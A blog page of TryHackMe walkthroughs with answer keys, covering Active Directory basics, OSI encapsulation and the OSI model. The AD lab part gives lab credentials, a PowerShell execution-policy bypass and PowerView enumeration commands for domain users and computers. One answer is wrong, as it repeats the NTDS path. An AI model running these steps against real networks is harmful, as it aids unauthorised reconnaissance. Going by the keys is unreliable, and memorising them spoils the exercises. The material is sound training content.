    The majority of large companies use Active Directory because it allows for the control and monitoring of their user's computers through a single domain controller. It allows a single user to sign in to any computer on the active directory network and have access to his or her stored files and folders in the server, as well as the local storage on that machine. This allows for any user in the company to use any machine that the company owns, without having to set up multiple users on a machine. Active Directory does it all for you.



    [Task 2] Physical Active Directory



    The physical Active Directory is the servers and machines on-premise, these can be anything from domain controllers and storage servers to domain user machines; everything needed for an Active Directory environment besides the software.





    Domain Controllers -


    A domain controller is a Windows server that has Active Directory Domain Services (AD DS) installed and has been promoted to a domain controller in the forest. Domain controllers are the center of Active Directory -- they control the rest of the domain. I will outline the tasks of a domain controller below:



        holds the AD DS data store
        handles authentication and authorization services
        replicate updates from other domain controllers in the forest
        Allows admin access to manage domain resources


    Active Directory Basics TryHackMe Walkthrough





    AD DS Data Store -


    The Active Directory Data Store holds the databases and processes needed to store and manage directory information such as users, groups, and services. Below is an outline of some of the contents and characteristics of the AD DS Data Store:


    Contains the NTDS.dit - a database that contains all of the information of an Active Directory domain controller as well as password hashes for domain users
    Stored by default in %SystemRoot%\NTDS
    accessible only by the domain controller



    That is everything that you need to know in terms of physical and on-premise Active Directory. Now move on to learn about the software and infrastructure behind the network.




    #1 What database does the AD DS contain?


    Ans :- NTDS.dit



    #2 Where is the NTDS.dit stored?


    Ans :- %SystemRoot%\NTDS





    #3 What type of machine can be a domain controller?

    Ans :- %SystemRoot%\NTDS





    [Task 3] The Forest



    The forest is what defines everything; it is the container that holds all of the other bits and pieces of the network together -- without the forest all of the other trees and domains would not be able to interact. The one thing to note when thinking of the forest is to not think of it too literally -- it is a physical thing just as much as it is a figurative thing. When we say "forest", it is only a way of describing the connection created between these trees and domains by the network.



    Active Directory Basics TryHackMe Walkthrough




    Forest Overview -

    A forest is a collection of one or more domain trees inside of an Active Directory network. It is what categorizes the parts of the network as a whole.

    The Forest consists of these parts which we will go into farther detail with later:

    •     Trees - A hierarchy of domains in Active Directory Domain Services
    •     Domains - Used to group and manage objects
    •     Organizational Units (OUs) - Containers for groups, computers, users, printers and other OUs
    •     Trusts - Allows users to access resources in other domains
    •     Objects - users, groups, printers, computers, shares
    •     Domain Services - DNS Server, LLMNR, IPv6
    •     Domain Schema - Rules for object creation



    #1 What is the term for a hierarchy of domains in a network?


    Ans :- Trees



    #2 What is the term for the rules for object creation?

    Ans :- Domain Schema



    #3 What is the term for containers for groups, computers, users, printers, and other OUs?


    Ans :- Organizational Units

     

    [Task 4] Users + Groups



    The users and groups that are inside of an Active Directory are up to you; when you create a domain controller it comes with default groups and two default users: Administrator and guest. It is up to you to create new users and create new groups to add users to.







    Users Overview -


    Users are the core to Active Directory; without users why have Active Directory in the first place? There are four main types of users you'll find in an Active Directory network; however, there can be more depending on how a company manages the permissions of its users. The four types of users are: 


    •     Domain Admins - This is the big boss: they control the domains and are the only ones with access to the domain controller.
    •     Service Accounts (Can be Domain Admins) - These are for the most part never used except for service maintenance, they are required by Windows for services such as SQL to pair a service with a service account
    •     Local Administrators - These users can make changes to local machines as an administrator and may even be able to control other normal users, but they cannot access the domain controller
    •     Domain Users - These are your everyday users. They can log in on the machines they have the authorization to access and may have local administrator rights to machines depending on the organization.





    Groups Overview -

    Groups make it easier to give permissions to users and objects by organizing them into groups with specified permissions. There are two overarching types of Active Directory groups:

    •     Security Groups - These groups are used to specify permissions for a large number of users
    •     Distribution Groups - These groups are used to specify email distribution lists. As an attacker these groups are less beneficial to us but can still be beneficial in enumeration



     
    Default Security Groups -

    There are a lot of default security groups so I won't be going into too much detail of each past a brief description of the permissions that they offer to the assigned group. Here is a brief outline of the security groups:


    •     Domain Controllers - All domain controllers in the domain
    •     Domain Guests - All domain guests
    •     Domain Users - All domain users
    •     Domain Computers - All workstations and servers joined to the domain
    •     Domain Admins - Designated administrators of the domain
    •     Enterprise Admins - Designated administrators of the enterprise
    •     Schema Admins - Designated administrators of the schema
    •     DNS Admins - DNS Administrators Group
    •     DNS Update Proxy - DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).
    •     Allowed RODC Password Replication Group - Members in this group can have their passwords replicated to all read-only domain controllers in the domain
    •     Group Policy Creator Owners - Members in this group can modify group policy for the domain
    •     Denied RODC Password Replication Group - Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain
    •     Protected Users - Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information.
    •     Cert Publishers - Members of this group are permitted to publish certificates to the directory
    •     Read-Only Domain Controllers - Members of this group are Read-Only Domain Controllers in the domain
    •     Enterprise Read-Only Domain Controllers - Members of this group are Read-Only Domain Controllers in the enterprise
    •     Key Admins - Members of this group can perform administrative actions on key objects within the domain.
    •     Enterprise Key Admins - Members of this group can perform administrative actions on key objects within the forest.
    •     Cloneable Domain Controllers - Members of this group that are domain controllers may be cloned.
    •     RAS and IAS Servers - Servers in this group can access remote access properties of users


    #1 Which type of groups specify user permissions?

    Ans :- Security Groups



    #2 Which group contains all workstations and servers joined to the domain?

    Ans :- Domain Computers



    #3 Which group can publish certificates to the directory?


     Ans :- Cert publishers




    #4 Which user can make changes to a local machine but not to a domain controller?

    Ans :- Local Administrators




    #5 Which group has their passwords replicated to read-only domain controllers?


    Ans :- Allowed RODC Password Replication Group



     



     

    [Task 5] Trusts + Policies




    Trusts and policies go hand in hand to help the domain and trees communicate with each other and maintain "security" inside of the network. They put the rules in place of how the domains inside of a forest can interact with each other, how an external forest can interact with the forest, and the overall domain rules or policies that a domain must follow.



    Domain Trusts Overview -


    Trusts are a mechanism in place for users in the network to gain access to other resources in the domain. For the most part, trusts outline the way that the domains inside of a forest communicate to each other, in some environments trusts can be extended out to external domains and even forests in some cases.




    There are two types of trusts that determine how the domains communicate. I'll outline the two types of trusts below:

    •     Directional - The direction of the trust flows from a trusting domain to a trusted domain
    •     Transitive - The trust relationship expands beyond just two domains to include other trusted domains


    The type of trusts put in place determines how the domains and trees in a forest are able to communicate and send data to and from each other when attacking an Active Directory environment you can sometimes abuse these trusts in order to move laterally throughout the network.



    Domain Policies Overview -



    Policies are a very big part of Active Directory, they dictate how the server operates and what rules it will and will not follow. You can think of domain policies like domain groups, except instead of permissions they contain rules, and instead of only applying to a group of users, the policies apply to a domain as a whole. They simply act as a rulebook for Active  Directory that a domain admin can modify and alter as they deem necessary to keep the network running smoothly and securely. Along with the very long list of default domain policies, domain admins can choose to add in their own policies not already on the domain controller, for example: if you wanted to disable windows defender across all machines on the domain you could create a new group policy object to disable Windows Defender. The options for domain policies are almost endless and are a big factor for attackers when enumerating an Active Directory network. I'll outline just a few of the  many policies that are default or you can create in an Active Directory environment:



    •     Disable Windows Defender - Disables windows defender across all machine on the domain
    •     Digitally Sign Communication (Always) - Can disable or enable SMB signing on the domain controller




    #1 What type of trust flows from a trusting domain to a trusted domain?

    Ans :- Directional




    #2 What type of trusts expands to include other trusted domains?

    Ans :- Transitive


    [Task 6] Active Directory Domain Services + Authentication




    The Active Directory domain services are the core functions of an Active Directory network; they allow for management of the domain, security certificates, LDAPs, and much more. This is how the domain controller decides what it wants to do and what services it wants to provide for the domain.





    Domain Services Overview -


    Domain Services are exactly what they sound like. They are services that the domain controller provides to the rest of the domain or tree. There is a wide range of various services that can be added to a domain controller; however, in this room we'll only be going over the default services that come when you set up a Windows server as a domain controller. Outlined below are the default domain services:


    •     LDAP - Lightweight Directory Access Protocol; provides communication between applications and directory services
    •     Certificate Services - allows the domain controller to create, validate, and revoke public key certificates
    •     DNS, LLMNR, NBT-NS - Domain Name Services for identifying IP hostnames



    Domain Authentication Overview -



    The most important part of Active Directory -- as well as the most vulnerable part of Active Directory -- is the authentication protocols set in place. There are two main types of authentication in place for Active Directory: NTLM and Kerberos. Since these will be covered in more depth in later rooms we will not be covering past the very basics needed to understand how they apply to Active Directory as a whole.



    •     Kerberos - The default authentication service for Active Directory uses ticket-granting tickets and service tickets to authenticate users and give users access to other resources across the domain.
    •     NTLM - default Windows authentication protocol uses an encrypted challenge/response protocol


    The Active Directory domain services are the main access point for attackers and contain some of the most vulnerable protocols for Active Directory, this will not be the last time you see them mentioned in terms of Active Directory security.





    #1 What type of authentication uses tickets?

    Ans :- Kerberos


    #2 What domain service can create, validate, and revoke public key certificates?


    Ans :- Certificate Services



    [Task 7] AD in the Cloud



    Recently there has been a shift in Active Directory pushing the companies to cloud networks for their companies. The most notable AD cloud provider is Azure AD. Its default settings are much more secure than an on-premise physical Active Directory network; however, the cloud AD may still have vulnerabilities in it.





    Azure AD Overview -


    Azure acts as the middle man between your physical Active Directory and your users' sign on. This allows for a more secure transaction between domains, making a lot of Active Directory attacks ineffective.




    Cloud Security Overview -


    The best way to show you how the cloud takes security precautions past what is already provided with a physical network is to show you a comparison with a cloud Active Directory environment:


    Windows Server AD    Azure AD
    • LDAP    Rest APIs
    • NTLM    OAuth/SAML
    • Kerberos    OpenID
    • OU Tree    Flat Structure
    • Domains and Forests    Tenants
    • Trusts    Guests




    This is only an overview of Active Directory in the cloud so we will not be going into detail of any of these protocols; however, I encourage you to go out and do your own research into these cloud protocols and how they are more secure than their physical counterparts, and if they themselves come with vulnerabilities.






    #1 What is the Azure AD equivalent of LDAP?


    Ans :- Rest APIs



    #2 What is the Azure AD equivalent of Domains and Forests?

    Ans :- Tenants




    #3 What is the Windows Server AD equivalent of Guests?


    Ans :- Trusts

     

    [Task 8] Hands-On Lab



    Lab Setup - 


    1.) Deploy the Machine

    2.) SSH or RDP into the machine


    user: Administrator

    pass: P@$$W0rd



    domain: CONTROLLER.local


    PowerView Setup -

    1.) cd Downloads - navigate to the directory PowerView is in

    2.) powershell -ep bypass - load a powershell shell with execution policy bypassed

    3.) . .\PowerView.ps1 - import the PowerView module






    Lab Overview -


    I will help you with a few commands the rest is up to you. Use the following cheatsheet here to find what you need. You should have enough knowledge of Active Directory now to investigate the machine's internals on your own.



    Example Commands:


    Get-NetComputer -fulldata | select operatingsystem - gets a list of all operating systems on the domain








    Get-NetUser | select cn - gets a list of all users on the domain








    #2 What is the name of the windows 10 operating system?


    Ans :-Windows 10 Enterprise Evaluation




    #3 What is the second "Admin" name?


    Ans :- Admin2






    #4 Which group has a capital "V" in the group name?


    Ans :- Hyer-V Administrator




    #5 When was the password last set for the SQLService user?





















    Ans :- 5/13/2020  8:26:58 PM







    Video Tutorial :- 




        

     

     

     

    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)




  • Introductory Networking : Encapsulation





    As the data is passed down each layer of the model, more information containing details specific to the layer in question is added on to the start of the transmission. As an example, the header added by the Network Layer would include things like the source and destination IP addresses, and the header added by the Transport Layer would include (amongst other things) information specific to the protocol being used. The data link layer also adds a piece on at the end of the transmission, which is used to verify that the data has not been corrupted on transmission; this also has the added bonus of increased security, as the data can't be intercepted and tampered with without breaking the trailer. This whole process is referred to as encapsulation; the process by which data can be sent from one computer to another. Introductory Networking : Encapsulation








    Notice that the encapsulated data is given a different name at different steps of the process. In layers 7,6 and 5, the data is simply referred to as data. In the transport layer the encapsulated data is referred to as a segment or a datagram (depending on whether TCP or UDP has been selected as a transmission protocol). At the Network Layer, the data is referred to as a packet. When the packet gets passed down to the Data Link layer it becomes a frame, and by the time it's transmitted across a network the frame has been broken down into bits.






    When the message is received by the second computer, it reverses the process -- starting at the physical layer and working up until it reaches the application layer, stripping off the added information as it goes. This is referred to as de-encapsulation. As such you can think of the layers of the OSI model as existing inside every computer with network capabilities. Whilst it's not actually as clear cut in practice, computers all follow the same process of encapsulation to send data and de-encapsulation upon receiving it.



    The processes of encapsulation and de-encapsulation are very important -- not least because of their practical use, but also because they give us a standardised method for sending data. This means that all transmissions will consistently follow the same methodology, allowing any network enabled device to send a request to any other reachable device and be sure that it will be understood -- regardless of whether they are from the same manufacturer; use the same operating system; or any other factors.




    See Also :- 


    The OSI Model: An Overview :- Click Here





    #1 How would you refer to data at layer 2 of the encapsulation process (with the OSI model)?


    Answer :- Frames



    #2 How would you refer to data at layer 4 of the encapsulation process (with the OSI model), if the UDP protocol has been selected?


    Answer :- Datagram



    #3 What process would a computer perform on a received message?


    Answer :- De-Encapsulation




    #4 Which is the only layer of the OSI model to add a trailer during encapsulation?




    Answer :- Data Link



    #5 Does encapsulation provide an extra layer of security (Aye/Nay)?


    Answer :- Aye




    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)



  • The OSI Model: An Overview



    The OSI Model: An Overview




    The OSI (Open Systems Interconnection) Model is a standardised model which we use to demonstrate the theory behind computer networking. In practice, it's actually the more compact TCP/IP model that real-world networking is based off; however the OSI model, in many ways, is easier to get an initial understanding from.The OSI Model: An Overview



    The OSI model consists of seven layers:




    The OSI Model: An Overview







    There are many mnemonics floating around to help you learn the layers of the OSI model -- search around until you find one that you like.


    I personally favour: Anxious Pale Shakespeare Treated Nervous Drunks Patiently


    Let's briefly take a look at each of these in turn:





    Layer 7 -- Application:



    The application layer of the OSI model essentially provides networking options to programs running on a computer. It works almost exclusively with applications, providing an interface for them to use in order to transmit data. When data is given to the application layer, it is passed down into the presentation layer.





    Layer 6 -- Presentation:



    The presentation layer receives data from the application layer. This data tends to be in a format that the application understands, but it's not necessarily in a standardised format that could be understood by the application layer in the receiving computer. The presentation layer translates the data into a standardised format, as well as handling any encryption, compression or other transformations to the data. With this complete, the data is passed down to the session layer.







    Layer 5 -- Session:



    When the session layer receives the correctly formatted data from the presentation layer, it looks to see if it can set up a connection with the other computer across the network. If it can't then it sends back an error and the process goes no further. If a session can be established then it's the job of the session layer to maintain it, as well as co-operate with the session layer of the remote computer in order to synchronise communications. The session layer is particularly important as the session that it creates is unique to the communication in question. This is what allows you to make multiple requests to different endpoints simultaneously without all the data getting mixed up (think about opening two tabs in a web browser at the same time)! When the session layer has successfully logged a connection between the host and remote computer the data is passed down to Layer 4: the transport Layer.





    Layer 4 -- Transport:


    The transport layer is a very interesting layer that serves numerous important functions. Its first purpose is to choose the protocol over which the data is to be transmitted. The two most common protocols in the transport layer are TCP (Transmission Control Protocol) and UDP (User Datagram Protocol); with TCP the transmission is connection-based which means that a connection between the computers is established and maintained for the duration of the request. This allows for a reliable transmission, as the connection can be used to ensure that the packets all get to the right place. A TCP connection allows the two computers to remain in constant communication to ensure that the data is sent at an acceptable speed, and that any lost data is re-sent. With UDP, the opposite is true; packets of data are essentially thrown at the receiving computer -- if it can't keep up then that's its problem (this is why a video transmission over something like Skype can be pixelated if the connection is bad). What this means is that TCP would usually be chosen for situations where accuracy is favoured over speed (e.g. file transfer, or loading a webpage), and UDP would be used in situations where speed is more important (e.g. video streaming).


    With a protocol selected, the transport layer then divides the transmission up into bite-sized pieces (over TCP these are called segments, over UDP they're called datagrams), which makes it easier to transmit the message successfully.




    Layer 3 -- Network:


    The network layer is responsible for locating the destination of your request. For example, the Internet is a huge network; when you want to request information from a webpage, it's the network layer that takes the IP address for the page and figures out the best route to take. At this stage we're working with what is referred to as Logical addressing (i.e. IP addresses) which are still software controlled. Logical addresses are used to provide order to networks, categorising them and allowing us to properly sort them. Currently the most common form of logical addressing is the IPV4 format, which you'll likely already be familiar with (i.e 192.168.1.1 is a common address for a home router).





    Layer 2 -- Data Link:


    The data link layer focuses on the physical addressing of the transmission. It receives a packet from the network layer (that includes the IP address for the remote computer) and adds in the physical (MAC) address of the receiving endpoint. Inside every network enabled computer is a Network Interface Card (NIC) which comes with a unique MAC (Media Access Control) address to identify it.


    MAC addresses are set by the manufacturer and literally burnt into the card; they can't be changed -- although they can be spoofed. When information is sent across a network, it's actually the physical address that is used to identify where exactly to send the information.


    Additionally, it's also the job of the data link layer to present the data in a format suitable for transmission.


    The data link layer also serves an important function when it receives data, as it checks the received information to make sure that it hasn't been corrupted during transmission, which could well happen when the data is transmitted by layer 1: the physical layer.





    Layer 1 -- Physical:



    The physical layer is right down to the hardware of the computer. This is where the electrical pulses that make up data transfer over a network are sent and received. It's the job of the physical layer to convert the binary data of the transmission into signals and transmit them across the network, as well as receiving incoming signals and converting them back into binary data.










    For the "Which Layer" Questions below, answer using the layer number (1-7):




    #1 Which layer would choose to send data over TCP or UDP?


    Answer :- 4




    #2 Which layer checks received packets to make sure that they haven't been corrupted?


    Answer :- 2



    #3 In which layer would data be formatted in preparation for transmission?


    Answer :- 2



    #4 Which layer transmits and receives data?


    Answer :- 1



    #5 Which layer encrypts, compresses, or otherwise transforms the initial data to give it a standardised format?


    Answer :- 6



    #6 Which layer tracks communications between the host and receiving computers?


    Answer :- 5



    #7 Which layer accepts communication requests from applications?


    Answer :- 7



    #8 Which layer handles logical addressing?


    Answer :- 3





    #9 When sending data over TCP, what would you call the "bite-sized" pieces of data?


    Answer :- segment



    #10 [Research] Which layer would the FTP protocol communicate with?


    Answer :- 7



    #11 Which transport layer protocol would be best suited to transmit a live video?


    Answer :- UDP





    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)



  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.